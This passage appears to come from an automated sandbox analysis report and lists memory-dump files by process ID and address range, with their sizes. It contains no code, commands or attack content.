      • memory/1120-10-0x000000001AAB0000-0x000000001AAB1000-memory.dmp
        Filesize

        4KB

      • memory/1120-11-0x000000001A790000-0x000000001A791000-memory.dmp
        Filesize

        4KB

      • memory/1184-5-0x0000000000000000-mapping.dmp
      • memory/1380-19-0x0000000000000000-mapping.dmp
      • memory/1380-31-0x00000000001B0000-0x00000000001D1000-memory.dmp
        Filesize

        132KB

      • memory/1380-32-0x0000000010000000-0x0000000010024000-memory.dmp
        Filesize

        144KB

      • memory/1380-20-0x00000000760B1000-0x00000000760B3000-memory.dmp
        Filesize

        8KB

      • memory/1472-33-0x0000000000000000-mapping.dmp
      • memory/1612-44-0x0000000000000000-mapping.dmp
      • memory/1736-25-0x0000000000000000-mapping.dmp
      • memory/1872-2-0x0000000072501000-0x0000000072504000-memory.dmp
        Filesize

        12KB

      • memory/1872-3-0x000000006FF81000-0x000000006FF83000-memory.dmp
        Filesize

        8KB

      • memory/1872-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1976-43-0x000007FEF7810000-0x000007FEF7A8A000-memory.dmp
        Filesize

        2.5MB